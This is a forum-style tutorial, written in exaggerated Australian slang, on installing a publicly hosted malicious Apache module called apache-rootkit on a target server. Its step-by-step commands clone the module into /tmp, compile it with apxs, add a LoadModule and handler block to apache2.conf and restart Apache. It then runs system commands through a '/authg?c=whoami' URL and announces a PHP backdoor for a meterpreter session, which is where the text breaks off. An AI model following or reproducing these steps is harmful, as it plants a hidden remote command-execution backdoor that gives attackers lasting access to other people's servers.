It's a sneaky little computer program that's designed to give the attackers ongoing access to a computer, all while keeping its presence under wraps.
These dodgy characters might use rootkits to hide the existence of other nasty programs, files, network connections, services, drivers, and other bits and bobs in the system. Rootkits are like the chameleons of the computer world - they intercept and modify the operating system's API calls that provide information about what's going on in the system, so they can stay hidden.
Setting Up apache-rootkit
Alright, now let's have a look at how to set up this apache-rootkit thing, mate. You can find the module over at this link:
https://github.com/ChristianPapathanasiou/apache-rootkit
This apache-rootkit is a real sneaky bugger - it's a malicious Apache module with rootkit capabilities. The best part is, you can load it into an Apache2 configuration without too much fuss, and it'll leave hardly any traces behind. Ripper!
-- 1 -- Alright, to get this apache-rootkit up and running, you'll need to install the Apache2 development kit first. Just run the following command on the target system:
Code: Select all
sudo apt-get install apache2-devRightio, to get this apache-rootkit working, we need to get our hands on the Apache2 development kit first. We need to use that to compile the module's source code into a shared object file.
-- 2 -- Before we go ahead and clone that apache-rootkit repository, we'll need to make our way over to the temporary directory on the target system:
Code: Select all
cd /tmp-- 3 -- Now, clone the repository:
Code: Select all
git clone https://github.com/ChristianPapathanasiou/apache-rootkit.git-- 4 -- Now that we've got that apache-rootkit repo all cloned, let's mosey on over to the actual "apache-rootkit" directory:
Code: Select all
cd apache-rootkit-- 5 -- It's time to get this module compiled up:
Code: Select all
apxs -c -i mod_authg.cJust run that command I mentioned, and the module will get all compiled up nicely. Then it'll automatically copy itself over to the right spot, so we don't have to worry about that.
-- 6 -- Now, get it loaded up in the Apache2 configuration. All we need to do is run this command:
Code: Select all
vim /etc/apache2/apache2.conf-- 7 -- You'll want to pop the following configuration at the top of the file. This will ensure the module gets loaded up correctly and we can start using all the nifty features it's got to offer:
Code: Select all
LoadModule authg_module /usr/lib/apache2/modules/mod_authg.so
<Location /authg>
SetHandler authg
</Location>Now that we've got that configuration all sorted out, save the file.
-- 8 -- After loading the “mod_authg.so” module, you'll need to restart the apache2 service, just type this command:
Code: Select all
sudo systemctl restart apache2TESTING ROOTKIT
Now that we've put together an' loaded up the apache-rootkit module, we can give it a proper test by tryin' out some sneaky command injection tricks.
Ya can do the ol' command injection on the apache2 server by openin' up this URL in ya browser:
Code: Select all
http://<SERVER-IP>/authg?c=whoamiThis here URL taps into the apache-rootkit module handler called "authg" and tries to flog a system command to get it runnin'.
If the apache-rootkit module's doin' its thing, ya should get the output of the command we chucked in as "www-data".
Now that we've checked an' made sure the module's all good an' workin', we can use it to set up a sneaky little PHP backdoor. This'll give us a meterpreter session whenever we run it, no worries.